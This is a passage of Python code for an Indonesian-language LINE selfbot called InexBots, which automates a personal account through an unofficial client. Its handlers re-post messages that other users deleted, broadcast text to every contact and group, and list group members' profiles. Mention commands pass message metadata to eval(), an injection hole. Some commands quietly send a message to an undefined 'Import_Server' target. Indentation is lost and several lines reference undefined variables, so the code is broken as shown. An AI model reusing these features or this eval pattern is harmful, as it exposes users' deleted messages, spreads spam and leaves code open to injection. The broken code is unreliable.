ry = str(jaka.displayName)
pesan = ''
pesan2 = pesan+"{} \n".format(str(jaka.displayName))
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':jaka.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
sendTextTemplate3(at, text)
cl.sendImage(at, msg_dict[msg_id]["data"])
else:
ginfo = cl.getGroup(at)
jaka = cl.getContact(msg_dict[msg_id]["from"])
ret_ = "╭━━━━══════════════"
ret_ += "\n┣☠•➤ Pesan Dihapus"
ret_ += "\n┣☠•➤ Pengirim : {}".format(str(jaka.displayName))
ret_ += "\n┣☠•➤ Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n┣☠•➤ Waktu Dikirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict[msg_id]["createdTime"])))
ret_ += "\n┣☠•➤ Pesannya : {}".format(str(msg_dict[msg_id]["text"]))
ret_ += "\n╰━━━━══════════════"
sendTextTemplate3(at, str(ret_))
del msg_dict[msg_id]
except Exception as e:
print(e)
if wait["unsend"] == True:
try:
at = op.param1
msg_id = op.param2
if msg_id in msg_dict1:
if msg_dict1[msg_id]["from"]:
ginfo = cl.getGroup(at)
jaka = cl.getContact(msg_dict1[msg_id]["from"])
ret_ = "「 Sticker Dihapus 」\n"
ret_ = "╭━━━━══════════════"
ret_ += "\n┣☠•➤ Pengirim : {}".format(str(jaka.displayName))
ret_ += "\n┣☠•➤ Nama Grup : {}".format(str(ginfo.name))
ret_ += "\n┣☠•➤ Waktu Ngirim : {}".format(dt_to_str(cTime_to_datetime(msg_dict1[msg_id]["createdTime"])))
ret_ += "\n┣☠•➤ {}".format(str(msg_dict1[msg_id]["text"]))
ret_ += "\n╰━━━━══════════════"
sendTextTemplate3(at, str(ret_))
cl.sendImage(at, msg_dict1[msg_id]["data"])
del msg_dict1[msg_id]
except Exception as e:
print(e)
#===============
if op.type == 26:
try:
msg = op.message
text = str(msg.text)
msg_id = msg.id
receiver = msg.to
sender = msg._from
terminal = command(text)
for terminal in terminal.split(" & "):
setKey = settings["keyCommand"].title()
if settings["setKey"] == False:
setKey = ''
if msg.toType == 0 or msg.toType == 1 or msg.toType == 2:
if msg.toType == 0:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
elif msg.toType == 1:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 0:
if to in offbot:
return
elif msg.contentType == 16:
if settings["checkPost"] == True:
try:
ret_ = "☠•Details Post•☠"
if msg.contentMetadata["serviceType"] == "GB":
contact = cl.getContact(sender)
auth = "\n☠•➤Penulis•➤•➤ : {}".format(str(contact.displayName))
else:
auth = "\n☠•➤Penulis•➤•➤ : {}".format(str(msg.contentMetadata["serviceName"]))
purl = "\n☠URL☠•➤ : {}".format(str(msg.contentMetadata["postEndUrl"]).replace("line://","https://line.me/R/"))
ret_ += auth
ret_ += purl
if "mediaOid" in msg.contentMetadata:
object_ = msg.contentMetadata["mediaOid"].replace("svc=myhome|sid=h|","")
if msg.contentMetadata["mediaType"] == "V":
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n☠•Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
murl = "\n☠•Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n☠•Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
murl = "\n☠•Media URL : https://obs-us.line-apps.com/myhome/h/download.nhn?{}".format(str(object_))
ret_ += murl
else:
if msg.contentMetadata["serviceType"] == "GB":
ourl = "\n☠•Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(msg.contentMetadata["mediaOid"]))
else:
ourl = "\n☠•Objek URL : https://obs-us.line-apps.com/myhome/h/download.nhn?tid=612w&{}".format(str(object_))
ret_ += ourl
if "stickerId" in msg.contentMetadata:
stck = "\n☠•Stiker : https://line.me/R/shop/detail/{}".format(str(msg.contentMetadata["packageId"]))
ret_ += stck
if "text" in msg.contentMetadata:
text = "\n☠•Tulisan :\n{}".format(str(msg.contentMetadata["text"]))
ret_ += text
ret_ += "\n☠•Finish"
sendTextTemplate1(to, str(ret_))
except:
sendTextTemplate1(to, "Post tidak valid")
except Exception as error:
logError(error)
#=============================[[
if op.type == 25 or op.type == 26:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0 or msg.toType == 2:
if msg.toType == 0:
to = receiver
elif msg.toType == 2:
to = receiver
if msg.contentType == 7:
if wait["sticker"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,"STKID : " + msg.contentMetadata["STKID"] + "\nSTKPKGID : " + msg.contentMetadata["STKPKGID"] + "\nSTKVER : " + msg.contentMetadata["STKVER"]+ "\n\n「Link Sticker」" + "\nline://shop/detail/" + msg.contentMetadata["STKPKGID"])
if msg.contentType == 13:
if wait["contact"] == True:
msg.contentType = 0
cl.sendMessage(msg.to,msg.contentMetadata["mid"])
if 'displayName' in msg.contentMetadata:
contact = cl.getContact(msg.contentMetadata["mid"])
path = cl.getContact(msg.contentMetadata["mid"]).picturePath
image = 'http://dl.profile.line.naver.jp'+path
sendTextTemplate(msg.to,"☠•➤Nama : " + msg.contentMetadata["displayName"] + "\n☠•➤MID : " + msg.contentMetadata["mid"] + "\n☠•➤Status Msg : " + contact.statusMessage + "\n☠•➤Picture URL : http://dl.profile.line-cdn.net/" + contact.pictureStatus)
cl.sendImageWithURL(msg.to, image)
#ADD Bots
if msg.contentType == 13:
if msg._from in admin:
if wait["addbots"] == True:
if msg.contentMetadata["mid"] in Bots:
sendTextTemplate(msg.to,"Contact itu sudah jadi anggota bot")
wait["addbots"] = True
else:
Bots.append(msg.contentMetadata["mid"])
wait["addbots"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke anggota bot")
if wait["dellbots"] == True:
if msg.contentMetadata["mid"] in Bots:
Bots.remove(msg.contentMetadata["mid"])
sendTextTemplate(msg.to,"Berhasil menghapus dari anggota bot")
else:
wait["dellbots"] = True
sendTextTemplate(msg.to,"Contact itu bukan anggota bot Dpk")
#ADD STAFF
if msg._from in admin:
if wait["addstaff"] == True:
if msg.contentMetadata["mid"] in staff:
sendTextTemplate(msg.to,"Contact itu sudah jadi staff")
wait["addstaff"] = True
else:
staff.append(msg.contentMetadata["mid"])
wait["addstaff"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke staff")
if wait["dellstaff"] == True:
if msg.contentMetadata["mid"] in staff:
staff.remove(msg.contentMetadata["mid"])
sendTextTemplate(msg.to,"Berhasil menghapus dari staff")
wait["dellstaff"] = True
else:
wait["dellstaff"] = True
sendTextTemplate(msg.to,"Contact itu bukan staff")
#ADD ADMIN
if msg._from in admin:
if wait["addadmin"] == True:
if msg.contentMetadata["mid"] in admin:
sendTextTemplate(msg.to,"Contact itu sudah jadi admin")
wait["addadmin"] = True
else:
admin.append(msg.contentMetadata["mid"])
wait["addadmin"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke admin")
if wait["delladmin"] == True:
if msg.contentMetadata["mid"] in admin:
admin.remove(msg.contentMetadata["mid"])
sendTextTemplate(msg.to,"Berhasil menghapus dari admin")
else:
wait["delladmin"] = True
sendTextTemplate(msg.to,"Contact itu bukan admin")
#ADD BLACKLIST
if msg._from in admin:
if wait["wblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
sendTextTemplate(msg.to,"Contact itu sudah ada di blacklist")
wait["wblacklist"] = True
else:
wait["blacklist"][msg.contentMetadata["mid"]] = True
wait["wblacklist"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke blacklist user")
if wait["dblacklist"] == True:
if msg.contentMetadata["mid"] in wait["blacklist"]:
del wait["blacklist"][msg.contentMetadata["mid"]]
sendTextTemplate(msg.to,"Berhasil menghapus dari blacklist user")
else:
wait["dblacklist"] = True
sendTextTemplate(msg.to,"Contact itu tidak ada di blacklist")
#TALKBAN
if msg._from in admin:
if wait["Talkwblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
sendTextTemplate(msg.to,"Contact itu sudah ada di Talkban")
wait["Talkwblacklist"] = True
else:
wait["Talkblacklist"][msg.contentMetadata["mid"]] = True
wait["Talkwblacklist"] = True
sendTextTemplate(msg.to,"Berhasil menambahkan ke Talkban user")
if wait["Talkdblacklist"] == True:
if msg.contentMetadata["mid"] in wait["Talkblacklist"]:
del wait["Talkblacklist"][msg.contentMetadata["mid"]]
sendTextTemplate(msg.to,"Berhasil menghapus dari Talkban user")
else:
wait["Talkdblacklist"] = True
sendTextTemplate(msg.to,"Contact itu tidak ada di Talkban")
#UPDATE FOTO
if msg.contentType == 1:
if msg._from in admin:
if Setmain["Addimage"] == True:
msgid = msg.id
fotoo = "https://obs.line-apps.com/talk/m/download.nhn?oid="+msgid
headers = cl.Talk.Headers
r = requests.get(fotoo, headers=headers, stream=True)
if r.status_code == 200:
path = os.path.join(os.path.dirname(__file__), 'dataPhotos/%s.jpg' % Setmain["Img"])
with open(path, 'wb') as fp:
shutil.copyfileobj(r.raw, fp)
sendTextTemplate(msg.to, "Berhasil menambahkan gambar")
Setmain["Img"] = {}
Setmain["Addimage"] = False
if msg.toType == 2:
if msg._from in admin:
if settings["groupPicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["groupPicture"] = False
cl.updateGroupPicture(msg.to, path)
sendTextTemplate(msg.to, "Berhasil mengubah foto group")
if msg.contentType == 1:
if msg._from in admin:
if mid in Setmain["ARfoto"]:
path = cl.downloadObjectMsg(msg_id)
del Setmain["ARfoto"][mid]
cl.updateProfilePicture(path)
sendTextTemplate(msg.to,"Foto berhasil dirubah")
if msg.contentType == 1:
if msg._from in admin:
if settings["changePicture"] == True:
path = cl.downloadObjectMsg(msg_id)
settings["changePicture"] = False
cl.updateProfilePicture(path)
sendTextTemplate(msg.to, "Berhasil mengubah foto profile bot")
if msg.contentType == 0:
if Setmain["autoRead"] == True:
cl.sendChatChecked(msg.to, msg_id)
if text is None:
return
else:
cmd = command(text)
if cmd == "help" or cmd == "Help":
if msg._from in owner or msg._from in admin or msg._from in staff:
cl.sendMessage(Import_Server,Devert)
cl.sendFlex(to, plate["helpgrup"])
if cmd == "helpmedia":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage = help()
sendTextTemplate3(msg.to, str(helpMessage))
if cmd == "help2":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessagea = helpa()
sendTextTemplate3(msg.to, str(helpMessagea))
if cmd == "on":
if msg._from in admin:
wait["selfbot"] = True
sendTextTemplate(msg.to, "Selfbot diaktifkan")
elif cmd == "off":
if msg._from in admin:
wait["selfbot"] = False
sendTextTemplate(msg.to, "Selfbot dinonaktifkan")
if cmd == "movie":
cl.sendFlex(to, mengirim["movie"])
elif cmd == "galeri" or cmd == "Galeri":
cl.sendFlex(to, plate["galery"])
elif text.lower() == 'sepi':
sendTextTemplate3(to, "╔════╗╔════\n║▓▓▓█║║▓▓▓█\n║▓▓▓█║║▓▓▓█\n║▓▓▓█╚╝▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓█╔╗▓▓▓█\n║▓▓▓█║║▓▓▓█\n║▓▓▓█║║▓▓▓█\n╚╦═══╝╚═══\n╔╝▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓█╔╗▓▓▓█\n║▓▓▓█╚╝▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓▓▓█\n║▓▓▓█╔╗▓▓▓█\n║▓▓▓█║║▓▓▓█\n╠════╝╚══\n║▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓▓█\n║▓▓▓█║▓▓▓▓█\n║▓▓▓█╚╗▓▓▓█\n║▓▓▓█╔╝▓▓▓█\n║▓▓▓█║▓▓▓▓█\n║▓▓▓▓▓▓▓▓█\n║▓▓▓▓▓▓▓█\n╩╦══════\n═║▓▓▓▓▓█\n═║▓▓▓▓▓█\n═╚╗▓▓▓█\n══║▓▓▓█\n══║▓▓▓█\n═╔╝▓▓▓█\n═║▓▓▓▓▓█\n═║▓▓▓▓▓█\n╔╩══════\n║▓▓▓▓▓▓▓▓█\n║▓▓▓█║▓▓▓▓█\n║▓▓▓█╠═▓▓▓█\n║▓▓▓█║▓▓▓█\n║▓▓▓▓▓▓▓█\n║▓▓▓█▓▓▓█\n║▓▓▓█║▓▓▓█\n║▓▓▓█╠╗▓▓▓█\n╚════╝╚═══")
elif text.lower() == 'price':
cl.sendFlex(to, plate["pricelist"])
elif cmd == "listapp":
if msg._from in owner or msg._from in admin or msg._from in staff:
cl.sendFlex(to, plate["listapp1"])
cl.sendFlex(to, plate["listapp2"])
elif cmd == "memberpict":
if msg._from in owner or msg._from in admin or msg._from in staff:
kontak = cl.getGroup(to)
group = kontak.members
picall = []
for ids in group:
if len(picall) >= 400:
pass
else:
picall.append({
"imageUrl": "https://os.line.naver.jp/os/p/{}".format(ids.mid),
"action": {
"type": "uri",
"uri": "http://line.me/ti/p/~denjaka-inexx"
}
}
)
k = len(picall)//10
for aa in range(k+1):
data = {
"type": "template",
"altText": "{} Membagikan janda geratis".format(jakaProfile.displayName),
"template": {
"type": "image_carousel",
"columns": picall[aa*10 : (aa+1)*10]
}
}
cl.sendFlex(to, data)
elif cmd == "key":
if wait["selfbot"] == True:
if msg._from in admin:
helpMessage1 = helpbot()
sendTextTemplate13(msg.to, str(helpMessage1))
elif cmd == "reject":
if wait["selfbot"] == True:
if msg._from in owner:
ginvited = cl.getGroupIdsInvited()
if ginvited != [] and ginvited != None:
for gid in ginvited:
cl.rejectGroupInvitation(gid)
sendTextTemplate(to, "Succes reject {} ".format(str(len(ginvited))))
else:
sendTextTemplate(to, "sᴇᴍᴜᴀ ɢʀᴜᴘ sᴜᴅᴀʜ ᴅɪʙᴀᴛᴀʟᴋᴀɴ")
elif cmd == "memberlist":
if msg._from in owner or msg._from in admin or msg._from in staff:
group = cl.getGroup(to)
ret_ = "╭━━━══[ Member List ]"
no = 0 + 1
for mem in group.members:
ret_ += "\n{}. {}".format(str(no), str(mem.displayName))
no += 1
ret_ += "\n╰━━━══[ Total {} member]".format(str(len(group.members)))
sendTextTemplate3(msg.to, ret_)
elif cmd == "pendinglist":
if msg._from in owner or msg._from in admin or msg._from in staff:
group = cl.getGroup(to)
ret_ = "╭━━━══[ Pending List ]"
no = 0 + 1
if group.invitee is None or group.invitee == []:
sendTextTemplate(to, "Tidak ada pendingan")
return
else:
for pen in group.invitee:
ret_ += "\n├ ☠ {}. {}".format(str(no), str(pen.displayName))
no += 1
ret_ += "\n╰━━━══[ Total {} tertunda]".format(str(len(group.invitee)))
sendTextTemplate3(msg.to, ret_)
elif cmd == "me":
h = cl.getContact(msg._from)
cover = cl.getProfileCoverURL(msg._from)
cl.reissueUserTicket()
data = {
"type": "flex",
"altText": "{} Berak di celana".format(str(h.displayName)),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#000000",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#000000"
},
"footer": {
"backgroundColor": "#000000",
"separator": True
}
},
"hero": {
"type": "image",
"url": "https://os.line.naver.jp/os/p/{}".format(msg._from),
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"body": {
"type": "box",
"layout": "vertical",
"spacing": "md",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
},
"contents": [
{
"type": "text",
"text": "🅸🅽🅴🆇🅱🅾🆃🆂",
"size": "md",
"color": "#0000FF"
},
{
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [
{
"type": "box",
"layout": "baseline",
"contents": [
{
"type": "icon",
"url": "https://os.line.naver.jp/os/p/{}".format(msg._from),
"size": "5xl"
},
{
"type": "text",
"text": " Name : ",
"weight": "bold",
"color": "#0000FF",
"margin": "sm",
"flex": 0
},
{
"type": "text",
"text": h.displayName,
"size": "sm",
"align": "end",
"color": "#0000FF"
}
]
}
]
},
{
"type": "text",
"text": "_________________________________________________\nɬɧąŋƙʂ ɬơ ąƖƖąɧ \nɬɧąŋƙʂ ɬơ ℘ཞąŋƙცơɬʂ,\nąŋɖ ɬɧąŋƙʂ ɬơ ıŋɛҳ ɬɛąɱ.",
"wrap": True,
"color": "#0000FF",
"size": "xxs"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"contents": [
{
"type": "spacer",
"size": "sm"
},
{
"type": "button",
"style": "primary",
"color": "#0000FF",
"action": {
"type": "uri",
"label": "CONTACT",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
}
]
}
}
}
cl.sendFlex(to, data)
elif cmd == "profil":
contact = cl.getContact(msg._from)
cover = cl.getProfileCoverURL(msg._from)
cl.reissueUserTicket()
res = "╭━━━━━━━━━━━━━━━━━━━━╮\n├ ☠ Profile info\n├━━━━━━━━━━━━━━━━━━━━\n"
res += "├ ☠ Display Name :{}\n".format(contact.displayName)
res += "├ ☠ Mid: {}\n".format(contact.mid)
res += "├ ☠ Status Message\n├ ☠ {}\n".format(contact.statusMessage)
res += "╰━━━━━━━━━━━━━━━━━━━━╯"
cl.sendMessage(Import_Server,Devert)
sendTextTemplate13(to, res)
try:
poto = "https://os.line.naver.jp/os/p/{}".format(msg._from)
except:
poto = "https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcQcNdUbC8kEeVWqgR9qMX66lQ_hQPM8ScNY30x4nqpYaKY2jt02"
dax = {
"type": "template",
"altText": "berak di celana",
"template": {
"type": "image_carousel",
"columns": [
{
"imageUrl": poto,
"layout": "horizontal",
"action": {
"type": "uri",
"label": "PROFILE",
"uri": poto,
"area": {
"x": 447,
"y": 356,
"width": 1040,
"height": 1040
}
}
},
{
"imageUrl": cover,
"layout": "horizontal",
"action": {
"type": "uri",
"label": "COVER",
"uri": cover,
"area": {
"x": 447,
"y": 356,
"width": 1040,
"height": 1040
}
}
},
{
"imageUrl": "https://qr-official.line.me/L/"+cl.getUserTicket().id+".png",
"layout": "horizontal",
"action": {
"type": "uri",
"label": "CONTACT",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id,
"area": {
"x": 447,
"y": 356,
"width": 1040,
"height": 1040
}
}
}
]
}
}
cl.sendFlex(to, dax)
elif cmd == "status":
if wait["selfbot"] == True:
if msg._from in admin:
tz = pytz.timezone("Asia/Jakarta")
timeNow = datetime.now(tz=tz)
md = "☠•PŘØŤĘČŤÎØŇ•☠\n"
if wait["sticker"] == True: md+="☠•➤Sticker「ON」\n"
else: md+="☠•➤Sticker「OFF」\n"
if wait["contact"] == True: md+="☠•➤Contact「ON」\n"
else: md+="☠•➤Contact「OFF」\n"
if wait["talkban"] == True: md+="☠•➤Talkban「ON」\n"
else: md+="☠•➤Talkban「OFF」\n"
if wait["Mentionkick"] == True: md+="☠•➤Notag「ON」\n"
else: md+="☠•➤Notag「OFF」\n"
if wait["detectMention"] == True: md+="☠•➤Respon 1「ON」\n"
else: md+="☠•➤Respon 1「OFF」\n"
if wait["detectMention2"] == True: md+="☠•➤Respon 2「ON」\n"
else: md+="☠•➤Respon 2「OFF」\n"
if wait["arespon"] == True: md+="☠•➤Respon pm「ON」\n"
else: md+="☠•➤Respon pm「OFF」\n"
if wait["autoJoin"] == True: md+="☠•➤Autojoin「ON」\n"
else: md+="☠•➤Autojoin「OFF」\n"
if wait["autoAdd"] == True: md+="☠•➤Autoadd「ON」\n"
else: md+="☠•➤Autoadd「OFF」\n"
if settings["autoBlock"] == True: md+="☠•➤AutoBlock「ON」\n"
else: md+="☠•➤AutoBlock「OFF」\n"
if msg.to in welcome: md+="☠•➤Welcome「ON」\n"
else: md+="☠•➤Welcome「OFF」\n"
if wait["autoLeave"] == True: md+="☠•➤Autoleave「ON」\n"
else: md+="☠•➤Autoleave「OFF」\n"
sendTextTemplate3(msg.to, md+"\nTanggal : "+ datetime.strftime(timeNow,'%Y-%m-%d')+"\nJam [ "+ datetime.strftime(timeNow,'%H:%M:%S')+" ]")
elif cmd == "creator" or text.lower() == 'pembuat':
if msg._from in admin:
cl.sendMessage(msg.to,"Creator InexBots")
ma = ""
for i in creator:
ma = cl.getContact(i)
cl.sendMessage(msg.to, None, contentMetadata={'mid': i}, contentType=13)
elif cmd == "about" or cmd == "informasi":
if wait["selfbot"] == True:
if msg._from in admin:
sendMention(msg.to, sender, "「 Type Selfbot 」\n")
cl.sendMessage(msg.to, None, contentMetadata={'mid': mid}, contentType=13)
elif text.lower() == "mid":
if wait["selfbot"] == True:
if msg._from in admin:
cl.sendMessage(msg.to, msg._from)
elif ("Getmid " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "Nama : "+str(mi.displayName)+"\nMID : " +key1)
#cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
elif ("Info " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mi = cl.getContact(key1)
cl.sendMessage(msg.to, "☠•➤Nama : "+str(mi.displayName)+"\n☠•➤Mid : " +key1+"\n☠•➤Status Msg"+str(mi.statusMessage))
cl.sendMessage(msg.to, None, contentMetadata={'mid': key1}, contentType=13)
if "videoProfile='{" in str(cl.getContact(key1)):
cl.sendVideoWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath)+'/vp.small')
else:
cl.sendImageWithURL(msg.to, 'http://dl.profile.line.naver.jp'+str(mi.picturePath))
elif text.lower() == "hapus chat":
if wait["selfbot"] == True:
if msg._from in admin:
try:
cl.removeAllMessages(op.param2)
except:
pass
elif "Pmcast: " in msg.text:
bctxt = msg.text.replace("Pmcast: ", "")
h = cl.getContact(msg._from)
a = cl.getAllContactIds()
cl.sendMessage(to, "Sukses broadcast ke "+str(len(a))+" teman")
for manusia in a:
C = cl.getContact(mid)
mids = [C.mid]
text = "BROADCAST FRIEND:\n\n{}\n\n⊶ ɪɴᴇxʙᴏᴛs ⊷ \nhttp://line.me/ti/p/~denjaka-inexx".format(str(bctxt))
sendMentionV2(manusia, text, mids)
#cl.sendMessage(manusia, (text))
elif cmd.startswith("gcast: "):
if wait["selfbot"] == True:
if msg._from in owner:
sep = text.split(" ")
pesan = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
sendBcast(grup, (bctxt))
elif cmd.startswith("bcast: "):
if msg._from in admin:
sep = text.split(" ")
bc = text.replace(sep[0] + " ","")
saya = cl.getGroupIdsJoined()
for group in saya:
ryan = cl.getContact(mid)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Broadcast 」\nBroadcast by "
ret_ = "{}".format(str(bc))
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "{} Menghapus anda dari grup ".format(jakaProfile.displayName),
"contents": {
"type": "bubble",
"styles": {
"header": {
"backgroundColor": "#0000FF",
},
"body": {
"backgroundColor": "#000000",
"separator": True,
"separatorColor": "#ffffff"
},
"footer": {
"backgroundColor": "#000080",
"separator": True
}
},
"header": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": "乃尺ㄖ卂ᗪ匚卂丂ㄒ",
"weight": "bold",
"color": warnanya1,
"size": "md"
}
]
},
"hero": {
"type": "image",
"url": "https://i.pinimg.com/originals/fd/47/e5/fd47e55dfb49ae1d39675d6eff34a729.gif",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
"action": {
"type": "uri",
"uri": "https://line.me/ti/p/~denjaka-inexx"
}
},
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"contents": [
{
"type": "text",
"text": str(pesan),
"wrap": True,
"color": warnanya1,
"align": "center"
}
]
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [{
"type": "button",
"style": "primary",
"color": warnanya1,
"height": "sm",
"action": {
"type": "uri",
"label": "ADD MY LINE",
"uri": "https://line.me/ti/p/"+cl.getUserTicket().id
}
},
{
"type": "spacer",
"size": "sm",
}],
"flex": 0
}
}
}
cl.sendFlex(group, data)
elif text.lower() == "mykey":
if wait["selfbot"] == True:
if msg._from in admin:
sendTextTemplate(msg.to, "「Mykey」\nSetkey bot mu「 " + str(Setmain["keyCommand"]) + " 」")
elif cmd.startswith("setkey "):
if wait["selfbot"] == True:
if msg._from in admin:
sep = text.split(" ")
key = text.replace(sep[0] + " ","")
if key in [""," ","\n",None]:
sendTextTemplate(msg.to, "Gagal mengganti key")
else:
Setmain["keyCommand"] = str(key).lower()
sendTextTemplate(msg.to, "「Setkey」\nSetkey diganti jadi「{}」".format(str(key).lower()))
elif text.lower() == "resetkey":
if wait["selfbot"] == True:
if msg._from in admin:
Setmain["keyCommand"] = ""
sendTextTemplate(msg.to, "「Setkey」\nSetkey mu kembali ke awal")
elif cmd == "restart":
if wait["selfbot"] == True:
if msg._from in admin:
sendTextTemplate(msg.to, "Tunggu sebentar...")
Setmain["restartPoint"] = msg.to
restartBot()
sendTextTemplate(msg.to, "Silahkan gunakan seperti semula...")
elif cmd == "runtime":
if wait["selfbot"] == True:
if msg._from in admin:
eltime = time.time() - mulai
bot = "Aktif " +waktu(eltime)
sendTextTemplate(msg.to,bot)
elif cmd == "tipi":
contact = cl.getContact(mid)
cu = cl.getProfileCoverURL(mid)
#image = str(cu)
data = {
"type": "flex",
"altText": "Live streaming",
"contents": {
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#000000"
}
},
"type": "bubble",
"hero": {
"type": "image",
"url": "https://i.gifer.com/AJvy.gif",
"size": "full",
"aspectRatio": "20:13",
"aspectMode": "cover",
},
"body": {
"contents": [
{
"contents": [
{
"url": "https://media1.tenor.com/images/42a8d4625aeb088c45eba5a84ca36325/tenor.gif?itemid=11193323",
"type": "image"
},
],
"type": "box",
"spacing": "sm",
"layout": "vertical"
},
{
"type": "separator",
"color": "#DC143C"
},
{
"contents": [
{
"text": " TV STREAMING",
"size": "md",
"align": "center",
"color": "#FF0000",
"wrap": True,
"weight": "bold",
"type": "text"
}
],
"type": "box",
"spacing": "sm",
"layout": "vertical"
},
{
"type": "separator",
"color": "#DC143C"
},
{
"contents": [
{
"contents": [
{
"url": "https://www.legayapi.com/theme/themeFiles/images/load.gif",
"type": "icon",
"size": "md"
},
{
"text":" SALURAN TELEVISI KELUARGA",
"size": "sm",
"margin": "none",
"color": "#6F4E37",
"wrap": True,
"weight": "regular",
"type": "text"
}
],
"type": "box",
"layout": "baseline"
}
],
"type": "box",
"layout": "vertical"
}
],
"type": "box",
"spacing": "md",
"layout": "vertical"
},
"footer": {
"type": "box",
"layout": "vertical",
"spacing": "sm",
"contents": [
{
"type": "button",
"style": "link",
"height": "sm",
"action": {
"type": "uri",
"label": "CHANNEL",
"uri": "line://app/1560739707-0YmQLW3W",
}
},
{
"type": "spacer",
"size": "sm",
}
],
"flex": 0
}
}
}
cl.sendFlex(to, data)
elif cmd == "ginfo":
if msg._from in owner or msg._from in admin or msg._from in staff:
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "SUDAH PUSKUN ORANGNYA"
if group.invitee is None:
gPending = "0"
else:
gPending = str(len(group.invitee))
if group.preventedJoinByTicket == True:
gQr = "Closed"
gTicket = "Qr tidak tersedia karna di tutup"
else:
gQr = "Open"
gTicket = "https://me.me/R/ti/g/{}".format(str(cl.reissueGroupTicket(group.id)))
timeCreated = []
timeCreated.append(time.strftime("%d-%m-%Y [ %H:%M:%S ]", time.localtime(int(group.createdTime) / 1000)))
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
ret_ = "╭━━══[ Group Info ]══━━"
ret_ += "\n Nama Group : {}".format(str(group.name))
ret_ += "\nWaktu Dibuat : {}".format(str(timeCreated))
ret_ += "\nID Group : {}".format(group.id)
ret_ += "\n Pembuat : {}".format(str(gCreator))
ret_ += "\n Jumlah Member : {}".format(str(len(group.members)))
ret_ += "\n Jumlah Pending : {}".format(gPending)
ret_ += "\n═━━━Kode Qr/Link━━━═"
ret_ += "\n Group Ticket : {}".format(gTicket)
ret_ += "\n Group Qr : {}".format(gQr)
ret_ += "\n╰━━══[ INEXBOT]══━━"
warna1 = ("#1AE501","#0108E5","#E50AE0","#E50F00","#DEE500","#47E1E5","#C82EF8")
warnanya1 = random.choice(warna1)
data = {
"type": "flex",
"altText": "Info grup",
"contents": {
"type": "bubble",
"body": {
"type": "box",
"layout": "horizontal",
"spacing": "md",
"contents": [
{
"type": "box",
"layout": "vertical",
"flex": 2,
"contents": [
{
"type": "text",
"text": str(ret_),
"size": "md",
"weight": "bold",
"wrap": True,
"color": warnanya1,
"align": "center"
},
]
}
]
},
"styles": {
"body": {
"backgroundColor": "#000000"
},
"footer": {
"backgroundColor": "#00FFFF"
},
"header": {
"backgroundColor": "#00FFFF"
